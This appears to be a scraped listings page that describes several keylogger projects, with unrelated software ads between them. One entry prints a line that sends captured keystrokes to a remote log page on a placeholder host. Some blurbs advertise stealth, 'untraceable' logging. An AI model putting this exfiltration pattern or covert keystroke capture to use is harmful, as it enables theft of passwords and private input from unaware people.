One platform to build, fine-tune, and deploy ML models. No MLOps team required.
Access Gemini 3 and 200+ models. Build chatbots, agents, or custom models with built-in monitoring and scaling.
Try Free
Stop Storing Third-Party Tokens in Your Database
Auth0 Token Vault handles secure token storage, exchange, and refresh for external providers so you don't have to build it yourself.
Rolling your own OAuth token storage can be a security liability. Token Vault securely stores access and refresh tokens from federated providers and handles exchange and renewal automatically. Connected accounts, refresh exchange, and privileged worker flows included.
Janilogger collects keystrokes to a textbox. And send the collected data to website panel. The asp file send datas to database.
For example:
You uploaded your log.asp to x.com . Janilogger sends datas to your database via log.asp with this command
Webbrowser1.Navigate("http://www.x.com/log.asp?yaz=text1.text")
-Log.asp included in source files
this is keylogger based on linux logkeys. it record inputs created on ur keyboard.i create GUI for ubuntu to assist newbie to use it. written in BUC. installer currently is just bash file. trying to get it running in deb.written in malay language.
Non-stealth keylogger for Windows. Records mouse and keyboard (precision~10-15ms), log of events (disk size~2.5k/s) + log of operations (~ 0.2k/s). Standalone, with local copy of Python: unzip to install, delete to uninstall.NEW: hidden/visible icon
Compliant and Reliable File Transfers Backed by Top Security Certifications
Cerberus FTP Server delivers SOC 2 Type II certified security and FIPS 140-2 validated encryption.
Stop relying on non-certified, legacy file transfer tools that creak under the weight of modern security demands. Get full audit trails, advanced access controls and more supported by an award-winning team of experts. Start your free 25-day trial today.
An Open Source Key logger Created in Borland Delphi 7.
Supports any Operaring System, and safest of it's kind.
It's unique and untraceable, use it for anything you can imagine.
A simple keylogger written in python. It is primarily designed for backup purposes, but can be used as a stealth keylogger, too. It does not raise any trust issues, since it is a set of [relatively] short python scripts that you can easily examine.
Sniper is a powerful keylogger component that can be easily integrated in applications. It is a small,easy-to-use ActiveX control that encapsulates all the complexity for logging keys and exposes a few important properties and methods.